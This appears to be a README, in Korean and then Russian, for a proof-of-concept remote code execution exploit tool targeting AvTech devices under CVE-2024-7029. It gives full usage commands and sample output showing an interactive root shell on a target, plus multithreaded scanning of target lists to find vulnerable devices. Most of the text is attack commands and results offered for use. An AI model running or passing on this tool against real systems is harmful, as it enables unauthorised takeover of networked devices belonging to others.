
AvTech 장치에서 발견된 CVE-2024-7029 취약점에 대한 PoC 익스플로잇으로, Remote Code Execution (RCE)을 허용합니다.
GenAvTechRCEExploit CVE-2024-7029 취약점에 대한 PoC 익스플로잇으로, AvTech 장치에서 원격 코드 실행(RCE)을 가능하게 합니다. 이 도구는 취약한 장치를 스캔하고 상호 작용 방식으로 명령을 실행할 수 있습니다.
requests 라이브러리prompt_toolkit 라이브러리alive_progress 라이브러리필요한 라이브러리는 다음 명령으로 설치하세요:
pip install -r requirements.txt
단일 대상의 취약점을 확인하고 대화형 셸을 시작하려면:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
<target_url>를 대상 장치의 실제 URL로 바꾸세요.
파일에 제공된 여러 대상을 스캔하려면(한 줄에 하나의 URL):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
<file_path>를 대상 URL이 포함된 파일 경로로 바꾸세요.
-t 옵션으로 스캔에 사용할 스레드 수를 지정할 수 있습니다:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
기본 스레드 수는 10입니다.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
GenAvTechRCEExploit - эксплоит для CVE-2024-7029 в устройствах AvTech, позволяющая удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.
requestsprompt_toolkitalive_progressУстановить необходимые библиотеки можно с помощью:
pip install -r requirements.txt
Для проверки уязвимости одной цели и запуска интерактивной оболочки:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
Замените <target_url> на реальный URL целевого устройства.
Для сканирования нескольких целей, указанных в файле (один URL на строку):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
Замените <file_path> на путь к файлу, содержащему URL-адреса целей.
Вы можете указать количество потоков для сканирования с помощью опции -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
По умолчанию количество потоков установлено на 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20